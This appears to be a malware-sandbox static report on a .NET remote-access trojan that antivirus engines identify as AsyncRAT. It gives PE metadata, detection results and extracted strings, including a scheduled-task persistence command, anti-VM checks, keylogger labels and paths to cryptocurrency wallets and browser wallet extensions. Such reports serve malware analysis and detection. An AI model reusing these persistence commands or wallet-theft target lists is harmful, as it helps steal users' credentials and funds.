Static | ZeroBOX

PE Compile Time

2023-03-22 01:57:55

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
| --- | --- | --- | --- | --- |
| .text | 0x00002000 | 0x0000f7a4 | 0x0000f800 | 5.56965299048 |
| .rsrc | 0x00012000 | 0x000007ff | 0x00000800 | 4.88486615034 |
| .reloc | 0x00014000 | 0x0000000c | 0x00000200 | 0.101910425663 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
| --- | --- | --- | --- | --- | --- |
| RT_VERSION | 0x000120a0 | 0x000002cc | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_MANIFEST | 0x0001236c | 0x00000493 | LANG_NEUTRAL | SUBLANG_NEUTRAL | exported SGML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |

Imports

Library mscoree.dll:
0x402000 _CorExeMain

Extracted strings

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<Read>b__0
<Read>b__2_1
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
QrxvDKuHLcnvHA
UdNWrThziPA
iPhPJeYSNkSA
tnXQlEeohHBfVA
dMjPEIwwqgsVA
CqGamSCNgeYA
oTSrlwAmjcA
CrrzQoAWTJdA
SystemParametersInfoA
gNYbcfNQUpoA
cTHlZAzWeJpJzTB
GiaMZCyjcB
FMwWVPUADHvrB
yMMDHibdFkXHC
soRrFYcvykZVC
IKSERXgyAWC
ZSeofMUeQlC
JBVWuFxIMcqC
sDEWcSkoaBHGyC
argrmjPObzzC
aXOPsOipOrCD
MapNameToOID
get_FormatID
MVfSKSXdNPnSOD
hHeKVeKtSD
JjPtOQtkuZVD
JJrOododguUlD
hlrfCQIkYPfmD
NSBhiSWxInuD
yVbYKepcNGDaGE
YVtPoOjtzPrGE
nCxrPKYbwXE
otANpJxmiJcE
xqtsVCumTcE
OuSAkRZLOnfE
NRJKqnKLShE
cFyLZBzUnE
yXhNLPhcGzE
WRzkUfOWhKEQAF
xkIOeawnzIFqIF
wOFRTBkXcQF
uoIGRaZDUKwTYPvF
IykNiRhbXFrBG
WVbhfGgmJzDG
czslwlksGDGG
EaLyecyzJOG
TYQOmeTEPG
vomWCCnFZqxPQWG
yxKYTaUlxWG
xgLvbJuSNHOYFRZG
DYXUmvAWTaG
fSPQfxCjbG
YcDKBsoCbIcG
KbJzwylAMjxfhG
rIeVfuSphG
XblBaEwzcGfzRjG
AckQzxDGaoDsG
FsjsFykMgEltCH
wJWjWGaNYBHmDH
xtTblEnQdIH
kZTrWiESyFFSqmJH
wkphzmiZeWOTLFYdKH
FmBAihHNaNOOMH
eSROvvhLmzcMSH
sUxBEYshcqH
gEydPqiwotH
OuxstKXXnpsGI
get_ASCII
tjfeFaTGYsJcI
PTgkuVwRerrI
YFJdTNdnNHDJ
UuoZppMATSJKRJ
XgkUTvGiMCuVJ
SXDeVtCNFtOzoJ
BVgofCKRgksJ
gZUXQxxDiEK
LWzUKtKKraIK
IjLGBcUDWrpGKK
ggcQjDrmQmStNK
TJMBCmpMBZPK
fKMubMyQWwMWoTK
BvcWgxRkPXUK
BkIEdralaK
ZqTrXrJkYxZcK
vHHNQXckKfK
KBdUQhuRITgK
EHcMGQYqcuVcmK
TpOjdDtStypK
BVwJrwcQambxdzK
fHDmTiimKL
gbHXJRljgDAEwmbML
uScvpCpwnPTL
hzuRPrwfvgL
tjwAaoPdGXAPiL
AjXBibKPutwL
GBDotujOWjQM
fPtMHVGbPmRM
ShsSzHNZuBuAOKxYM
QhwrkIMfhcM
FbZFmTiRAbgM
zeUVfOnQlxMAkM
azrlVLrBGwsjuM
jiLdJPgrtFRFN
ibrNpGNNkKHN
dbMEIFQNFOybIN
NiqUsECdIpMN
omrbaCpJsuNN
DSmQxZnDxcmYN
anYbqSCCIbN
XVHWivftizQhsN
aWHKkAeiPWxuGwN
QaDuiROzTjzN
JzWfdlOzLAO
System.IO
NDHuUmMAaXBLO
IBbNsgLnfXOCTuO
FThukYOlUBvO
ETmpRqRoRmKvO
OgthjGqddRzO
fsYPiPGbDKBP
uDbpRQZmkoGP
bOdZHyshKPIHP
QQSRQTJBvNP
jeHcCOZcxmKPSP
gzMwQcnrhBqPMZP
lvazFjjnAhFrCbP
QjnBdxDWFtAeP
xxOvuLxUDuP
xjvsMVAQGroFQ
iDQcJVSvNtoVHQ
kkFcVnovnTQ
belSTEbtUQ
mWHqTWstUQ
PLAsyBhBknWQ
XylaREQlEmqYQ
CdnkRxjXldaQ
hrqjzINNXzaQ
kGhZmEHyZJjbQ
AaZNPFkaydvSYNiQ
QoTkdqiwmTKvlQ
IOrDdjSWvwHuQ
PTLltgcyrAbxoAUR
jgsxCubJigzqWR
gNAxlHhUcYeR
TgxdNZWCmBZYvFhR
LIUYfJrvkAnR
KcJOkyGGmKFiLS
KdUoORCoWS
NuhqDyLcDeYlcS
eQUmCjSIiS
BjqnvFWXlmS
yrLgeJXjtS
JMUvVqTMnBT
JVSIvWEhhtGT
xvfIJlAPvFQIHT
GpiJrJsSpHT
LrHpMUctklNvT
NCeRszSJdQBU
JvdnlEzoXyBU
FRpwbIcBAIU
WdKaXjJUqbIyLJU
RAbyVdRLMU
ZnJsczSjiZU
GgqLKYzKMeU
rtujPkxPmtlpU
GMCmeNnLzoFV
get_IV
set_IV
GenerateIV
hXSklDcVzDJV
qYzKkKoWIWBQV
xqLIMNIiVV
TvKFIuFnmGxXV
MhHoAoZMTYV
FMgLaOTWYZV
LdVBZjdfKboV
RAevxhsnAOcoV
bAkxvxoUwIsV
ZLwxnoHzRgpxyV
hbqWhyCJEuFW
QseaFdoPrHW
oURGaAPQbYRW
SgLomqqkrXW
BezEojKsxxVcW
ZFvKnOPUDKJceW
EAHrYQlMGCArdeW
hKKDUCkiRlmVreW
UjRnLuvJAcXkW
fHtojOfMRmXuW
oJcWTgBixW
DTElsLhBDZFHX
vOnTaUpGxsfXIX
CDtuFwZqctZRX
RmnbVtuOmvRX
TiJOdFFDLqZX
WtjwUHEZVAXsuX
ODrkQhveaDKZszX
SonZylwifAgcHY
cScqpovLxKkZUNY
iuOLFfOhZOY
EIwaJroTVURY
HbomvGOMeparRZ
gkzmYjNgjPTZ
GievXSFKWZ
EwPcYWggHVTDaZ
AbTWvasDKDcZ
HXJlLLnWWfZ
agDFsscbFEPhZ
swHdcdSCWiZ
wqfhpBIztZ
nXkWqtyAGHfxZ
value__
qPsBrzofxXVPFa
qzErXKiACGa
eCzAxkfvjqMa
VjhSpUJYDYPa
HXdNHtWopxea
tMspROwhicKTla
vygcMSirHpa
vsckpaBXWwa
fmjVXIaWzBb
LAJQzTdYnJeiSb
lhjeiXKLSLTb
wvxnPzeiYhXb
gZDkkdEPytHZb
ZnayjxSiNpoxDgb
mscorlib
IrhjBcEDHPhlb
dCLymPbfHLpb
yjAworAxTsb
hDRrwHGSxAc
rQqEZrzoTBc
QVgvFmuinBc
oZkEPjZfYSbECc
KosDdkisnTTDc
GUdEjnfWOWeeGc
VgnJgOGoYxNc
LETPGtTjdQc
JGMqYqLWhTyRLgVc
pZGrsmmKYc
HJnSruWOzdSac
System.Collections.Generic
Microsoft.VisualBasic
AZfloTSQVmc
get_SendSync
bxtIULoxqkdvc
GetWindowThreadProcessId
GetProcessById
GHUygTqKeAjPLd
nbxorzhvJTthBouRd
RmtlJAsEncXd
EndRead
BeginRead
Thread
SHA256Managed
jTpznXiPred
get_Connected
get_IsConnected
set_IsConnected
get_Guid
olfrbKjMebYBLmXld
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
gWtokWiwWsld
Append
RegistryValueKind
CompareMethod
method
Clipboard
ffdjrlnGtkud
nWjmNjEmzd
RQuSgRWPwBCe
jYnWcXLaocFe
SRmThoDBYrGe
qwACWsCIrWIOwLIe
HxACNSwWDXCVLJe
kznbuBazoFsxJe
mmpGAARMMMMe
RCoqyhEUUdRe
AJVPLMvdXgiwTe
jVLLsVcGouaae
Replace
IsNullOrWhiteSpace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
EndInvoke
BeginInvoke
GetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
DownloadFile
IsInRole
WindowsBuiltInRole
get_MainWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
get_ProcessName
CheckHostName
DateTime
eYoKNIPzuMTHGne
zmEhATKinnGne
VuekvhqPgne
WriteLine
get_NewLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
MethodBase
Dispose
StrReverse
X509Certificate
Create
MulticastDelegate
GetKeyboardState
SetThreadExecutionState
SetApartmentState
GetKeyState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
ViKYOFOGiGQQCf
BLoqpobVWqRDf
GKpnIUaHldLf
SizeOf
aIjGQbrrWf
CFDEyiRvbSnmef
RIIgQrxOYOvKYhf
GkZDNSuVjf
wBmubDRxkPamf
JwsSSYEbJgsmf
OuqsdTUJeFdcNmqf
oCRBvdCkSjrf
vDYQYQlfjsXCg
PSUyOwdskSQDg
ERbIbXDCoPZXdPg
OBySBMwHEWCVg
gagagggagagag
asGnqXnNdZhlVdg
uFFzkMNdEvahg
ZfcQHuDUviRXfig
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
BlrrrdboMZcChBog
set_ErrorDialog
dHsbVvzBCpg
hDRERKlCJGCEh
habbqyaAfrWfYJLJh
UgEIWgRaOIiTXjMPh
AdeobeoBUrXQh
ZmVJSiQEzZh
JwsILkIAgyoh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
GetFolderPath
get_Length
EndsWith
domDircVeVwh
rSXqmOHpaWwh
TpIfiQkMysxh
plBzQDytsBJLi
GsKyHkgLaxPi
pQOKmMshkHTi
yzEmmqjIRQNkVVi
zuxDoHbcoNBj
jpfFePYKDj
WvbJBFCLpIfjWMj
wmNRRXANvXTj
IAYxoFsxZqTj
MOExqDtzEkWWj
YziYMJnfMYYj
XIwAJXuLNej
QYEbmdufYkjj
zimdaaDtGilj
ESDUQPeEeUnj
PvxoYCizqj
XvVTQYiTofrj
anwBvilwiBkasj
YHGXKJzhzCqkPsGk
VYENZtxpJiBXKVk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
RegistryKeyPermissionCheck
FlushFinalBlock
wgprdkciUboCyck
oSZkEyMutk
YqRJZSGsvk
EFFSphLOQKl
lVnFTDVsHnAPl
LFDVhPWcGrXl
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
LMRnWFYJiTWhl
tAIchDpchl
qChmBGvoDPwil
kernel32.dll
user32.dll
ntdll.dll
YlVsKWHOaMOql
ZxcAqwXecsl
PgUuRPJSDyGmxl
AKwfNFnibSDcGm
zJOaddQIHzjJm
UZomfOsWgsOm
jnjJhYHrzFXm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
lParam
wParam
get_Item
get_Is64BitOperatingSystem
AoENexzBNBqegm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
AgJzCPCSUrkm
Random
ICryptoTransform
ArTCKSvFsBdmLYdBn
AUcZEFEcNaVVZOn
ToBoolean
TimeSpan
lzmTLqHLEen
wGyrERbwhn
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
pqVDdZqrrgsn
MCCLlPyJbMOBYmGyn
DYlCiiCILwrRZUzn
bwTfkeYnJnNAJo
jQMTVXUdCjhNbo
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
MemberInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
GetLastInputInfo
DLlZISxFfso
LBEZRUrzclXQYrPvo
xYtYlQiGWhdnNwo
oskgFfeBVGGxo
CnYXSxDHtqAp
kxlMClfHRoCsGp
UuCwFpZOBVLLp
TKqLrsrYep
TcRTpylUOkDvhNhp
ankxZouwCcjp
Microsoft.CSharp
vQbblnyQhkCsp
qdqMUYMYNfNTdCq
opSrBYMXsoNEq
HTcmODIFGqXgNq
AtKomidSIWXq
System.Linq
hTlxdaozoq
IJLJzwFkwwSwBr
rHQIwXehngOhDr
wqOwqDXokNwmaGr
wNhFhknGQxxwoMr
vhdArAKrYUPer
jhTlRjfWstXJSer
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
SpecialFolder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
oTFqZXdiYLfukr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
NtqljyZPqlqr
IntPtr
vUCTjqjyNJFs
adhroHOhGs
vbQfQKEfWVrhmTHs
kbXWrWLEhIs
PrfSuKihtfPs
pdCeMCbCRaVs
AholEYBzBas
System.Diagnostics
SmjJtLxJEscs
FromSeconds
GetMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
GetDirectories
ExpandEnvironmentVariables
MZOwcEiWjIkjepes
GetTypes
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
BindingFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
WHgCPzyvuyjs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
qtsxiasYrns
wplaWhnrZrXXTDQqs
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
gfolTTuBWus
RVOFqKtrODt
WbepMDVPEt
IVQsywFVXIt
oaFIKzajdJrLt
ZkzorHvaijPgUt
mveYVhCNrUt
RECIEPRrhtcDoXt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
object
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
op_Explicit
IAsyncResult
result
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_TickCount
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
GetKeyboardLayout
System.Collections.IEnumerator.MoveNext
System.Text
ReadAllText
GetText
SetText
GetWindowText
tSMJfFJIxNu
yNNTOpnfdOisbu
SFNxVdGmBZgBAku
dCVXCdNAQmu
VHtgNFNAYPUtu
VTeKxtBCkvu
WPMCwgJVOBv
tTvqcgSURjYEv
cmRlAKOtGWtYGv
SJLguVckHv
NMtFfCfrDPv
NQnoVQxIQWv
CNjbyFuKPtXv
CvbIRZRPTkgv
HecUFxAepkv
ylgePqSGhEXSyxv
ZUDFNFdEuhzv
LNHjwFwvYsCRqAw
jekrvDNWnevZeCw
SctgCZZDfGw
CaSREvqJAtSrGfWw
kBTeqrMxdDkdYw
yXUOmxFhZwBPJgw
JgilUtSXhQvBUmw
GetForegroundWindow
set_CreateNoWindow
KLvcfkszuw
zgKJyUTnlnww
mMPzyynQihBx
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
KcyldfHpsHx
TTDGBiSrlBbx
lZEMphWqKnbx
JtWgLcRwvicwQcx
FmwnmNPClHkx
sbauPphpFOkx
dhvjnJWdnx
EApfObsGqXMpx
PYBPKJBCjptx
rJKGpLdRJQFy
VVztyuTrSy
ofVifTfrtXy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
MapVirtualKey
RegistryKey
System.Security.Cryptography
TPCjPjoPiy
rSiueqtsHky
Assembly
AddressFamily
BlockCopy
TflPvddXyoTvqy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
SsvDokvEkTIz
WxgHarLYKz
kGGWAgvkTZdOz
gyQiIvMNwSz
ySuINpZdgYnTz
FhIKxgZsllWdz
mdmoudnnJgz
DkyDAZbVIkz
DbuwhuQusgmkoz
bJovaoKeDWpHxz
WrapNonExceptionThrows
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
w70q7iVCZUBLrH36j5S+u4zs3rMxS3z+dxF1Nb66k6pQIfe6u4zLj0oOwqpw3Yy7wwst9UMmnJYhEJZSwdN6PBNMOnBzjQaR5S0J3VrRc9ZdxW/fTJ9Q0OZ947SQc9j5
7exIUa8L0uPu23/NxcFsnH4CBd/ea8B3YdG0hJ7pkdGLvhPBSbAsfbz3H9Odi72EVIah7VyhXmDZljsh9NyHVg==
imJ/H4r5QuFnaeCZiwMO/avsvvxJ+sKZTo97OWlHWoWSs0umkbF4NfJa7gaaS8rMuhquU4sSpsuWLw6PUi6FMAEAD21OaSCoX8NgcSbdeEU=
jCVMI+7PFiW/9n76x+shPVhOzUqUXky1KZBSX2TXQKS3QhZ4z0FocqBcaJ+bdUAF9tzpIjT/lN10cH40GvKQFA==
%AppData%
ak1ZQjZ2bEQ3VVlxMkRzMndYM21JNzlya1lzVVREMko=
SrlfNI5vbH1HHl50MHFQyV+obaGXluc/Su4FpzcCma+0EbqU24JiGETuF+BSFfitNxYZi+Bz7SWKBKl1Q35bhCToFLRQxsLGdDHFoCTPXzY=
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
ERg1V1HWXzVpMqwOWLDwUNexiU1GaDcd0NONOlkarEwNX9er45W941UmWRrFHGwjmw7drgPU/Qy5mOgCbFaE5g==
ETxDpuHS5D/ysLkhRLl+Nk3DaIqQZxljjIYJKIJTyV94tkh9nh8rQTgM8jTIGKGG+6aZhuNYISEhMnkOc1GDMQ==
RoFI0m7pZEZDEi2ZefsVMl+A02PJeRlnFz6zvSoEfuPyPB4ExiHgyOUE0CFIU1LqoELe24KvGG+VFwRmsi31Tw==
xClbevw3WGaAq/kjPh8Z44fD++nPaWqf5EGGf697qWSoQow3pL/aufTMNnYGK1tQNsRuPNF475UWFsP906jrWw==
XWOazeJ8OZXg6EpPdmqwDyX45FzbdA3M2fxl6jUB1MOlLrKH0Dtj1cp1WWKYor5ubs+jD533gFUASXHOLtU1F6vunDkdtqPNUAd0hoH0bLo=
Packet
Message
LastTime
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Performance
Pastebin
Antivirus
Meta_Firefox
MetaFirefox
\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Chrome
MetaChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Brave
MetaBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Meta_Edge
MetaEdge
\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Stable\Local Extension Settings\djclckkglechooblngghdinmeemkbgci
Meta_Opera
MetaOpera
\Opera Software\Opera GX Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Software\Opera GX Stable\Local Extension Settings\chrome-extension://djclckkglechooblngghdinmeemkbgci
Meta_OperaGX
MetaOperaGX
\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Chrome
PhantomChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Brave
PhantomBrave
\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Chrome
BinanceChrome
\Microsoft\Edge\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Edge
BinanceEdge
\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
TronLinkChrome
Exodus_Chrome
\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
BitKeep_Chrome
BitKeepChrome
\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Coinbase_Chrome
CoinbaseChrome
\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Ronin_Chrome
RoninChrome
\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Trust_Chrome
TrustChrome
\Google\Chrome\User Data\Default\Local Extension Settings\jkjgekcefbkpogohigkgooodolhdgcda
BitPay_Chrome
BitPayChrome
\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Chrome
F2aChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Brave
F2aBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
F2a_Edge
F2aEdge
\Ergo Wallet
Ergo_Wallet
ErgoWallet
\Ledger Live
Ledger_Live
LedgerLive
\atomic
Atomic
\Exodus
Exodus
\Electrum
Electrum
\Coinomi
Coinomi
\Binance
Binance
\Bitcoin
Bitcoin_Core
Bitcoin Core
BoolWallets
\Mozilla\Firefox\Profiles
-release
\extensions\webextension@metamask.io.xpi
Return
Escape
LControlKey
RControlKey
RShiftKey
LShiftKey
Capital
[SPACE]
[ENTER]
[CTRL]
[Shift]
[Back]
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
\Log.tmp
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
gettxt
passload
DicordTokens
WebBrowserPass
anydesk
getscreen
WDExclusion
weburl
killps
ResetScale
KillProxy
backproxy
uacoff
Wallets
Chrome
sendPlugin
Hashes
AllInOne
Password
Tokens
AVRemoval.Class1
Reset Scale succeeded!
BackProxy.Class1
wallets
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Clean
tehtris Clean
ClamAV Win.Packed.Razy-9625918-0
CMC Clean
CAT-QuickHeal Trojan.Generic.TRFH1214
Skyhigh BehavesLike.Win32.Fareit.km
ALYac Gen:Trojan.Mardom.MN.15
Cylance Unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Clean
Alibaba Clean
K7GW Clean
Cybereason malicious.8a7680
huorong Backdoor/Crysan.a
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.B
Paloalto Clean
Symantec ML.Attribute.HighConfidence
Elastic Windows.Trojan.Asyncrat
ESET-NOD32 a variant of MSIL/AsyncRAT.A
APEX Malicious
Avast Win32:DropperX-gen [Drp]
Cynet Clean
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Trojan.Mardom.MN.15
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Trojan.Mardom.MN.15
Tencent Trojan.MSIL.Agent.kr
TACHYON Clean
Sophos Troj/AsyncRat-B
F-Secure Trojan.TR/Dropper.Gen
DrWeb BackDoor.AsyncRATNET.2
VIPRE Gen:Trojan.Mardom.MN.15
TrendMicro Clean
McAfeeD ti!9334CE1AD264
Trapmine Clean
FireEye Generic.mg.7f20b668a7680f50
Emsisoft Gen:Trojan.Mardom.MN.15 (B)
Ikarus Backdoor.AsyncRat
GData Gen:Trojan.Mardom.MN.15
Jiangmin Trojan.Generic.hrafs
Webroot Clean
Varist W32/Samas.B.gen!Eldorado
Avira TR/Dropper.Gen
Antiy-AVL Clean
Kingsoft malware.kb.c.1000
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Mardom.MN.15
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft Backdoor:MSIL/AsyncRat.AD!MTB
Google Detected
AhnLab-V3 Malware/Win.Generic.C4980844
Acronis Clean
McAfee Trojan-FVQO!7F20B668A768
MAX malware (ai score=83)
VBA32 OScope.Backdoor.MSIL.Crysan
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.AntiVM!1.CF63 (CLASSIC)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Agent.CFQ!tr
BitDefenderTheta Gen:NN.ZemsilF.36812.em0@aqh6slk
AVG Win32:DropperX-gen [Drp]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (D)
alibabacloud Clean
No IRMA results available.